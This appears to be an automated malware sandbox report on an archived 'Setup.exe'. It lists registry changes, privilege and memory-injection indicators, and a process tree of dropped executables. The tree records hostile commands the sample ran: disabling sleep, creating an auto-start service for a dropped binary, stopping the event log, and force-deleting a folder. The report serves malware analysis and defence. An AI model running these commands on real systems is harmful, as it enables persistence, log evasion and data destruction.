Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	LvCpfrq.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	lUAENHe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	lUAENHe.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket	LvCpfrq.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	LvCpfrq.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	lUAENHe.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5216	schtasks.exe
1948	schtasks.exe
648	schtasks.exe
5708	schtasks.exe
6092	schtasks.exe
2852	schtasks.exe
5872	schtasks.exe
5964	schtasks.exe
4700	schtasks.exe
5288	schtasks.exe
4120	schtasks.exe
5800	schtasks.exe
2508	schtasks.exe
6032	schtasks.exe
5320	schtasks.exe
2608	schtasks.exe
5632	schtasks.exe
5508	schtasks.exe
6072	schtasks.exe
5896	schtasks.exe
4984	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2556	Setup.exe
2556	Setup.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
4960	KjZVPZ2zzTxT190CWK4vStrg.exe
4960	KjZVPZ2zzTxT190CWK4vStrg.exe
4960	KjZVPZ2zzTxT190CWK4vStrg.exe
4960	KjZVPZ2zzTxT190CWK4vStrg.exe
2528	taskmgr.exe
2528	taskmgr.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
2528	taskmgr.exe
2540	XNCiw3N_dPHReLk3Jy6T4EUo.exe
2540	XNCiw3N_dPHReLk3Jy6T4EUo.exe
2528	taskmgr.exe
4924	powershell.exe
4924	powershell.exe
988	RegAsm.exe
988	RegAsm.exe
4924	powershell.exe
2528	taskmgr.exe
4924	powershell.exe
4032	RegAsm.exe
4032	RegAsm.exe
236	MSBuild.exe
236	MSBuild.exe
2568	MSBuild.exe
2568	MSBuild.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
1500	powershell.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
2528	taskmgr.exe
236	MSBuild.exe
236	MSBuild.exe
2568	MSBuild.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2528	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2528	taskmgr.exe
Token: SeSystemProfilePrivilege	2528	taskmgr.exe
Token: SeCreateGlobalPrivilege	2528	taskmgr.exe
Token: SeDebugPrivilege	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe
Token: SeDebugPrivilege	4960	KjZVPZ2zzTxT190CWK4vStrg.exe
Token: SeDebugPrivilege	4032	RegAsm.exe
Token: SeBackupPrivilege	4032	RegAsm.exe
Token: SeSecurityPrivilege	4032	RegAsm.exe
Token: SeSecurityPrivilege	4032	RegAsm.exe
Token: SeSecurityPrivilege	4032	RegAsm.exe
Token: SeSecurityPrivilege	4032	RegAsm.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	988	RegAsm.exe
Token: SeIncreaseQuotaPrivilege	4464	WMIC.exe
Token: SeSecurityPrivilege	4464	WMIC.exe
Token: SeTakeOwnershipPrivilege	4464	WMIC.exe
Token: SeLoadDriverPrivilege	4464	WMIC.exe
Token: SeSystemProfilePrivilege	4464	WMIC.exe
Token: SeSystemtimePrivilege	4464	WMIC.exe
Token: SeProfSingleProcessPrivilege	4464	WMIC.exe
Token: SeIncBasePriorityPrivilege	4464	WMIC.exe
Token: SeCreatePagefilePrivilege	4464	WMIC.exe
Token: SeBackupPrivilege	4464	WMIC.exe
Token: SeRestorePrivilege	4464	WMIC.exe
Token: SeShutdownPrivilege	4464	WMIC.exe
Token: SeDebugPrivilege	4464	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4464	WMIC.exe
Token: SeRemoteShutdownPrivilege	4464	WMIC.exe
Token: SeUndockPrivilege	4464	WMIC.exe
Token: SeManageVolumePrivilege	4464	WMIC.exe
Token: 33	4464	WMIC.exe
Token: 34	4464	WMIC.exe
Token: 35	4464	WMIC.exe
Token: 36	4464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4464	WMIC.exe
Token: SeSecurityPrivilege	4464	WMIC.exe
Token: SeTakeOwnershipPrivilege	4464	WMIC.exe
Token: SeLoadDriverPrivilege	4464	WMIC.exe
Token: SeSystemProfilePrivilege	4464	WMIC.exe
Token: SeSystemtimePrivilege	4464	WMIC.exe
Token: SeProfSingleProcessPrivilege	4464	WMIC.exe
Token: SeIncBasePriorityPrivilege	4464	WMIC.exe
Token: SeCreatePagefilePrivilege	4464	WMIC.exe
Token: SeBackupPrivilege	4464	WMIC.exe
Token: SeRestorePrivilege	4464	WMIC.exe
Token: SeShutdownPrivilege	4464	WMIC.exe
Token: SeDebugPrivilege	4464	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4464	WMIC.exe
Token: SeRemoteShutdownPrivilege	4464	WMIC.exe
Token: SeUndockPrivilege	4464	WMIC.exe
Token: SeManageVolumePrivilege	4464	WMIC.exe
Token: 33	4464	WMIC.exe
Token: 34	4464	WMIC.exe
Token: 35	4464	WMIC.exe
Token: 36	4464	WMIC.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeIncreaseQuotaPrivilege	5092	WMIC.exe
Token: SeSecurityPrivilege	5092	WMIC.exe
Token: SeTakeOwnershipPrivilege	5092	WMIC.exe
Token: SeLoadDriverPrivilege	5092	WMIC.exe
Token: SeSystemProfilePrivilege	5092	WMIC.exe
Token: SeSystemtimePrivilege	5092	WMIC.exe
Token: SeProfSingleProcessPrivilege	5092	WMIC.exe
Token: SeIncBasePriorityPrivilege	5092	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
4888	61aT9Z_GFEpsfKAXD3NOSsRp.tmp
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
4472	b5ed612d79.exe
4472	b5ed612d79.exe
4472	b5ed612d79.exe
2528	taskmgr.exe
4472	b5ed612d79.exe
2528	taskmgr.exe
4472	b5ed612d79.exe
2528	taskmgr.exe
4472	b5ed612d79.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
2528	taskmgr.exe
4472	b5ed612d79.exe
4472	b5ed612d79.exe
4472	b5ed612d79.exe
2528	taskmgr.exe
4472	b5ed612d79.exe
2528	taskmgr.exe
4472	b5ed612d79.exe
2528	taskmgr.exe
4472	b5ed612d79.exe
4776	firefox.exe
4472	b5ed612d79.exe

Suspicious use of SetWindowsHookEx 40 IoCs

pid	Process
2556	Setup.exe
4912	61aT9Z_GFEpsfKAXD3NOSsRp.exe
4512	kbi1uXnIGQFsMyg7ltTx27kq.exe
684	fOam93AxbRSnB2uTOeOgHu8o.exe
1180	Dod2yc932472MaLNFYX35QpJ.exe
408	EAjBxZtW_w9am5uGGTwXFIds.exe
436	Y2YTSBAzM1gJXcAFXSXzOy7n.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
2888	DOtbApzMYH7mk1KIsntEgO9f.exe
4888	61aT9Z_GFEpsfKAXD3NOSsRp.tmp
988	RegAsm.exe
236	MSBuild.exe
2568	MSBuild.exe
3940	Install.exe
4032	RegAsm.exe
3728	goldenmusicalvariety32_64.exe
1532	Install.exe
4716	goldenmusicalvariety32_64.exe
2988	Install.exe
2956	Install.exe
3036	BitLockerToGo.exe
3756	cmd.exe
3388	6b3e4ff372.exe
3388	6b3e4ff372.exe
4472	b5ed612d79.exe
4924	JEBKKEGDBF.exe
908	RegAsm.exe
3472	EGHCAKKEGC.exe
2540	RegAsm.exe
2676	firefox.exe
4776	firefox.exe
4948	firefox.exe
4776	firefox.exe
2136	firefox.exe
3964	firefox.exe
5788	firefox.exe
5780	firefox.exe
5772	firefox.exe
504	firefox.exe
5088	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2556 wrote to memory of 4912	2556	Setup.exe	85
PID 2556 wrote to memory of 4912	2556	Setup.exe	85
PID 2556 wrote to memory of 4912	2556	Setup.exe	85
PID 2556 wrote to memory of 1104	2556	Setup.exe	86
PID 2556 wrote to memory of 1104	2556	Setup.exe	86
PID 2556 wrote to memory of 1104	2556	Setup.exe	86
PID 2556 wrote to memory of 2540	2556	Setup.exe	84
PID 2556 wrote to memory of 2540	2556	Setup.exe	84
PID 2556 wrote to memory of 4960	2556	Setup.exe	87
PID 2556 wrote to memory of 4960	2556	Setup.exe	87
PID 2556 wrote to memory of 4960	2556	Setup.exe	87
PID 2556 wrote to memory of 2888	2556	Setup.exe	88
PID 2556 wrote to memory of 2888	2556	Setup.exe	88
PID 2556 wrote to memory of 2888	2556	Setup.exe	88
PID 2556 wrote to memory of 4512	2556	Setup.exe	89
PID 2556 wrote to memory of 4512	2556	Setup.exe	89
PID 2556 wrote to memory of 4512	2556	Setup.exe	89
PID 2556 wrote to memory of 1180	2556	Setup.exe	90
PID 2556 wrote to memory of 1180	2556	Setup.exe	90
PID 2556 wrote to memory of 1180	2556	Setup.exe	90
PID 2556 wrote to memory of 684	2556	Setup.exe	91
PID 2556 wrote to memory of 684	2556	Setup.exe	91
PID 2556 wrote to memory of 684	2556	Setup.exe	91
PID 2556 wrote to memory of 436	2556	Setup.exe	92
PID 2556 wrote to memory of 436	2556	Setup.exe	92
PID 2556 wrote to memory of 436	2556	Setup.exe	92
PID 2556 wrote to memory of 408	2556	Setup.exe	93
PID 2556 wrote to memory of 408	2556	Setup.exe	93
PID 2556 wrote to memory of 408	2556	Setup.exe	93
PID 2556 wrote to memory of 1292	2556	Setup.exe	94
PID 2556 wrote to memory of 1292	2556	Setup.exe	94
PID 4912 wrote to memory of 4888	4912	61aT9Z_GFEpsfKAXD3NOSsRp.exe	95
PID 4912 wrote to memory of 4888	4912	61aT9Z_GFEpsfKAXD3NOSsRp.exe	95
PID 4912 wrote to memory of 4888	4912	61aT9Z_GFEpsfKAXD3NOSsRp.exe	95
PID 684 wrote to memory of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 684 wrote to memory of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 684 wrote to memory of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 684 wrote to memory of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 684 wrote to memory of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 684 wrote to memory of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 684 wrote to memory of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 684 wrote to memory of 988	684	fOam93AxbRSnB2uTOeOgHu8o.exe	96
PID 1180 wrote to memory of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 1180 wrote to memory of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 1180 wrote to memory of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 1180 wrote to memory of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 1180 wrote to memory of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 1180 wrote to memory of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 1180 wrote to memory of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 1180 wrote to memory of 4032	1180	Dod2yc932472MaLNFYX35QpJ.exe	97
PID 4960 wrote to memory of 2796	4960	KjZVPZ2zzTxT190CWK4vStrg.exe	99
PID 4960 wrote to memory of 2796	4960	KjZVPZ2zzTxT190CWK4vStrg.exe	99
PID 4960 wrote to memory of 2796	4960	KjZVPZ2zzTxT190CWK4vStrg.exe	99
PID 1104 wrote to memory of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100
PID 1104 wrote to memory of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100
PID 1104 wrote to memory of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100
PID 4960 wrote to memory of 2672	4960	KjZVPZ2zzTxT190CWK4vStrg.exe	102
PID 4960 wrote to memory of 2672	4960	KjZVPZ2zzTxT190CWK4vStrg.exe	102
PID 4960 wrote to memory of 2672	4960	KjZVPZ2zzTxT190CWK4vStrg.exe	102
PID 1104 wrote to memory of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100
PID 1104 wrote to memory of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100
PID 1104 wrote to memory of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100
PID 1104 wrote to memory of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100
PID 1104 wrote to memory of 236	1104	QREJCGg2DQlVCP1YSKuyOEqB.exe	100

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\archive.zip
1⤵
PID:1104

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4712

C:\Users\Admin\Desktop\archive\Setup.exe
"C:\Users\Admin\Desktop\archive\Setup.exe"
1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Users\Admin\Documents\SimpleAdobe\XNCiw3N_dPHReLk3Jy6T4EUo.exe
  C:\Users\Admin\Documents\SimpleAdobe\XNCiw3N_dPHReLk3Jy6T4EUo.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2540
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4816
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2064
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:988
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:4408
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:2508
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1908
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:356
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:3284
- C:\Users\Admin\Documents\SimpleAdobe\61aT9Z_GFEpsfKAXD3NOSsRp.exe
  C:\Users\Admin\Documents\SimpleAdobe\61aT9Z_GFEpsfKAXD3NOSsRp.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Users\Admin\AppData\Local\Temp\is-5RQBB.tmp\61aT9Z_GFEpsfKAXD3NOSsRp.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-5RQBB.tmp\61aT9Z_GFEpsfKAXD3NOSsRp.tmp" /SL5="$20328,5245090,54272,C:\Users\Admin\Documents\SimpleAdobe\61aT9Z_GFEpsfKAXD3NOSsRp.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:4888
  - - C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe
      "C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -i
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3728
  - - C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe
      "C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe" -s
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4716
- C:\Users\Admin\Documents\SimpleAdobe\QREJCGg2DQlVCP1YSKuyOEqB.exe
  C:\Users\Admin\Documents\SimpleAdobe\QREJCGg2DQlVCP1YSKuyOEqB.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:236
  - - C:\ProgramData\JEBKKEGDBF.exe
      "C:\ProgramData\JEBKKEGDBF.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      PID:4924
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4460
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:3748
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:1060
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        
        PID:908
  - - C:\ProgramData\EGHCAKKEGC.exe
      "C:\ProgramData\EGHCAKKEGC.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of SetWindowsHookEx
      PID:3472
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2540
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AAKKKEBFCGDB" & exit
      4⤵
      PID:5176
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:5208
- C:\Users\Admin\Documents\SimpleAdobe\KjZVPZ2zzTxT190CWK4vStrg.exe
  C:\Users\Admin\Documents\SimpleAdobe\KjZVPZ2zzTxT190CWK4vStrg.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2796
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2672
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2568
- C:\Users\Admin\Documents\SimpleAdobe\DOtbApzMYH7mk1KIsntEgO9f.exe
  C:\Users\Admin\Documents\SimpleAdobe\DOtbApzMYH7mk1KIsntEgO9f.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2888
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\IIEHCFIDHI.exe"
    3⤵
    PID:804
